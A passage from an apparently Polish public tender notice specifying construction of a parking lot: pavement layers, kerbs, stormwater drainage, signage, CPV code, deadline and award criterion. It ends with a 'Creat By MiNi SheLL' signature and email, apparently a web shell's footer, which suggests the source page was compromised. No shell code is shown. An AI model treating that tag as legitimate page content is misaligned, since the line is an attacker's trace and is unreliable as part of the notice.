-   Nawierzchnia z kostki Polbruk 8cm na warstwie wyrównawczej z mieszanki piaskowo - cementowej grubości 3-5cm. 
-   Górna warstwa podbudowy z tłucznia kamiennego o uziarnieniu 0-32,5 mm grubości 8cm 
-   Dolna warstwa podbudowy z tłucznia kamiennego o uziarnieniu 0-63mm  grubości 15cm 
-   Warstwa odsączająca z piasku grubości 15cm po zagęszczeniu. 

Krawężnik posadowić na ławie betonowej z oporem grubości 15 cm  z betonu B-15. na wysokości 12 cm  powyżej poziomu nawierzchni . Na krawędzi zjazdu przy ulicy Sienkiewicza wykonać krawężnik najazdowy . 
 Warstwa podsypki o grubości 15cm powinna być wykonana z piasku, albo żwiru. 
Właściwe odwodnienie powierzchniowe mają zapewnić spadki podłużne i poprzeczne.  Dalszy bieg wód opadowych przejmą urządzenia odwadniające. 
Do odwodnienia w miejscach spływu wód zastosowano dwie kratki ściekowe  na studniach fi 500 z odstojnikiem min. 0,5m głębokości z odprowadzeniem 
przykanalikiem fi 200 do studni kanalizacji burzowej. Kratki służą zebraniu większości wód opadowych do sieci. Niewielka ilość wody na zjazdach spłynie do kratek położonych na ulicy powiatowej. 
Znaki pionowe wykonać zgodnie z planem sytuacyjnym , mocując  na słupach stalowych ocynkowanych na wysokości 2m ponad nawierzchnię chodnika. 
Znaki poziome P-10 wykonać z farby chlorokauczukowej białej z kulkami szklanymi zgodnie z planem sytuacyjnym. Stanowiska postojowe wykonać z kostki o barwie kontrastującej w sposób widoczny z tłem nawierzchni parkingu. Proponuje się kolor parkingu szary i kolor linii stanowisk czerwony. 
Szczegółowy zakres przedmiotu zamówienia opisuje dokumentacja projektowa, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót budowlanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.22.33.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com